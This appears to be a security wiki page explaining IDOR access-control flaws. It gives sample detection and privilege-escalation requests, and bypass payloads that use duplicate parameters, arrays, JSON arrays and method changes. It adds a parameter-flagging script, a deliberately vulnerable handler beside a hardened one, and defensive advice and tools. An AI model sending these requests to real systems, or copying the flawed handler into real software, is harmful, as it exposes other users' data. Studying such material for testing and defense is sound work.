📌 Introduction
IDOR (Insecure Direct Object References) is an access-control vulnerability in which an externally exposed or user-supplied input directly references an object, so a caller can use it to perform actions beyond their own privileges.
Origin Request
GET /info?accountId=15442
IDOR Request
GET /info?accountId=1110
This usually yields horizontal privilege escalation, i.e. access to data at the same privilege level, but depending on the application's configuration or policy it can sometimes lead to vertical privilege escalation.
🗡 Offensive techniques
Detect
Every place in the application's processing logic where a user-supplied value directly references an object is affected. Identifier values such as IDs and usernames are the usual points of interest, and even parameter-less static files can be affected by IDOR when the data they serve is selected by identifying information.
Origin Request
POST /save_profile HTTP/1.1
account=15442&name=aaa
IDOR Request
POST /save_profile HTTP/1.1
account=1110&name=aaa
In the example above, account is a parameter that likely references the user's object; put another user's value into it and observe how the application processes the request and what it returns. If the data of the user whose account value is 1110 was changed, the application is judged vulnerable to IDOR.
With HUNT
In ZAP and Burp Suite, the HUNT add-on can identify requests that may be susceptible to IDOR as a passive scan. See the articles below for details.
- https://www.hahwul.com/2022/04/12/zap-hunt-remix/
- https://www.hahwul.com/2018/04/18/bugcrowd-hunt-burp-extension/
With GF-Patterns
The representative parameter names listed in GF-Patterns are shown below. These parameters are the main targets for IDOR.
[
"id=",
"user=",
"account=",
"number=",
"order=",
"no=",
"doc=",
"key=",
"email=",
"group=",
"profile=",
"edit=",
"report="
]
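As an added example (not code from the page or from GF-Patterns), the following script applies the parameter list above to constructed request lines, the way a reviewer might triage access logs or a proxy history for endpoints whose authorization checks deserve a closer look. Unlike the GF grep, it matches the name as a case-insensitive suffix of the parameter name, so the page's own accountId example is caught by "id=". The sample requests are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names from the GF-Patterns idor list quoted above (trailing "=" dropped).
IDOR_PARAM_NAMES = ["id", "user", "account", "number", "order", "no", "doc",
                    "key", "email", "group", "profile", "edit", "report"]

# GF-Patterns greps for the literal "name=" substring, so "accountId=" is caught by
# "id=". Mirror that by matching the name as a case-insensitive suffix (a design
# choice of this example, not GF's exact semantics).
_SUFFIX = re.compile("(?:%s)$" % "|".join(map(re.escape, IDOR_PARAM_NAMES)), re.IGNORECASE)

def candidate_params(request_line, body=""):
    """Parameter names in one request that look like direct object references.

    request_line is an HTTP request line such as "GET /info?accountId=15442 HTTP/1.1";
    body is an optional application/x-www-form-urlencoded body.
    """
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    return sorted({name for name, _ in pairs if _SUFFIX.search(name)})

# Constructed sample traffic (request line, body), not captured from any real system.
SAMPLE_REQUESTS = [
    ("GET /info?accountId=15442 HTTP/1.1", ""),
    ("GET /static/logo.png HTTP/1.1", ""),
    ("POST /save_profile HTTP/1.1", "account=15442&name=aaa"),
    ("GET /search?q=idor&page=2 HTTP/1.1", ""),
    ("POST /report/export HTTP/1.1", "report=77&format=pdf"),
]

def scan(requests):
    """Map each request line that carries a candidate parameter to those names."""
    hits = {}
    for line, body in requests:
        names = candidate_params(line, body)
        if names:
            hits[line] = names
    return hits

if __name__ == "__main__":
    for line, names in scan(SAMPLE_REQUESTS).items():
        print(f"{line}  <- review authorization on: {', '.join(names)}")
```

Running it lists the /info, /save_profile and /report/export requests and names the parameters (accountId, account, report) whose server-side authorization check should be verified; the static file and the search request produce no hit.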
Exploitation
Horizontal privilege escalation
Horizontal privilege escalation uses IDOR to handle data belonging to another user with similar privileges.
Origin Request
POST /save_profile HTTP/1.1
account=15442&name=aaa
IDOR Request
POST /save_profile HTTP/1.1
account=1110&name=aaa
Vertical privilege escalation
Vertical privilege escalation uses IDOR to handle data belonging to a user with higher privileges. Rather than a permission problem between ordinary accounts, it typically takes the form of intruding into the data of a higher-privileged account such as an admin.
Origin Request
POST /save_profile HTTP/1.1
account=15442&name=aaa
IDOR Request
POST /save_profile HTTP/1.1
admin_account=1&name=aaa
Bypass protection
HPP
IDOR protections can often be bypassed through HPP (HTTP Parameter Pollution).
Bypass Request
POST /save_profile HTTP/1.1
account=15442&account=1110&name=aaa
Bypass Request (Array)
POST /save_profile HTTP/1.1
account[]=15442&account[]=1110&name=aaa
JSON Array
Origin Request
POST /save_profile HTTP/1.1
{
"account":"15442"
}
Bypass Request
POST /save_profile HTTP/1.1
{
"account":[
"15442",
"1110"
]
}
Change Method
Bypass Request
PUT /save_profile HTTP/1.1
account=1110&name=aaa
🛡 Defensive techniques
The countermeasure is simple: do not trust user input; compare it against authentication information such as the session or cookie and verify authorization precisely.
For APIs and similar endpoints that cannot verify authentication information, you can also hide them behind the back end as microservices (MSA) or implement a separate interface so that users cannot control the data directly.
🕹 Tools
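As an added example (not code from the page), the following handler pair shows why the bypasses in the Bypass protection section work and what the defensive advice above looks like in code. The vulnerable handler authorizes on the first account value it sees but writes using the last one, which is the disagreement that duplicate parameters, account[] and JSON arrays exploit, and it accepts any HTTP method. The hardened handler takes the object reference from the session, refuses any parameter that is not exactly one scalar string, and allows only POST. The sessions, profile store and content-type constants are constructed for the example.

```python
import json
from urllib.parse import parse_qs

FORM = "application/x-www-form-urlencoded"
JSON = "application/json"

# Constructed sample data (not from the page): session id -> owning account id.
SESSIONS = {"sess-alice": "15442", "sess-bob": "1110"}

def sample_profiles():
    """Fresh copy of a constructed profile store keyed by account id."""
    return {"15442": {"name": "alice"}, "1110": {"name": "bob"}}

class Forbidden(Exception):
    pass

def _parse(body, content_type):
    """Normalise a form or JSON body to {name: [values...]} so both look alike."""
    if content_type == JSON:
        data = json.loads(body)
        return {k: v if isinstance(v, list) else [v] for k, v in data.items()}
    return parse_qs(body, keep_blank_values=True)

def vulnerable_save_profile(session_id, method, body, content_type, profiles):
    """Authorises on the first 'account' value but writes with the last one.

    This is the gap HPP exploits: the check and the data layer read different
    copies of a polluted parameter. The method is never checked.
    """
    if session_id not in SESSIONS:
        raise Forbidden("not authenticated")
    params = _parse(body, content_type)
    values = params["account"]
    if str(values[0]) != SESSIONS[session_id]:
        raise Forbidden("account does not match session")
    target = str(values[-1])            # a framework that keeps the last duplicate
    profiles[target]["name"] = params["name"][0]
    return target

def hardened_save_profile(session_id, method, body, content_type, profiles):
    """Derives the object reference from the session and rejects ambiguous input."""
    if method != "POST":
        raise Forbidden("method not allowed")
    if session_id not in SESSIONS:
        raise Forbidden("not authenticated")
    owner = SESSIONS[session_id]
    params = _parse(body, content_type)
    for key, values in params.items():
        # One scalar string per parameter: duplicates, account[] and JSON arrays are refused.
        if key.endswith("[]") or len(values) != 1 or not isinstance(values[0], str):
            raise Forbidden(f"ambiguous parameter {key!r}")
    # If the client names an account at all it must be its own; otherwise it is ignored.
    if params.get("account", [owner])[0] != owner:
        raise Forbidden("account does not belong to caller")
    if "name" not in params:
        raise Forbidden("missing name")
    profiles[owner]["name"] = params["name"][0]
    return owner

def rejected(handler, *args):
    """True if the handler refuses the request with Forbidden."""
    try:
        handler(*args)
    except Forbidden:
        return True
    return False

if __name__ == "__main__":
    polluted = "account=15442&account=1110&name=aaa"
    p = sample_profiles()
    print("vulnerable wrote to", vulnerable_save_profile("sess-alice", "POST", polluted, FORM, p))
    print("hardened rejects it:", rejected(hardened_save_profile, "sess-alice", "POST", polluted, FORM, p))
```

The hardened handler deliberately does not try to pick the "right" copy of a duplicated parameter: once the value comes from the session, the parameter is redundant, and any ambiguity in the request is grounds for rejection rather than interpretation.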
- ZAP
  - Access Control Testing AddOn
  - Scripting & Zest
- Burpsuite
  - Authz
  - AuthMatrix
  - Authorize
- Authz0
- apidor
- ozauthmatrix
📚 Articles
- https://www.hahwul.com/2022/04/12/zap-hunt-remix/
📖 References
- https://portswigger.net/web-security/access-control/idor
- https://github.com/1ndianl33t/Gf-Patterns/blob/master/idor.json
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
- https://wiki.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)
- https://book.hacktricks.xyz/pentesting-web/idor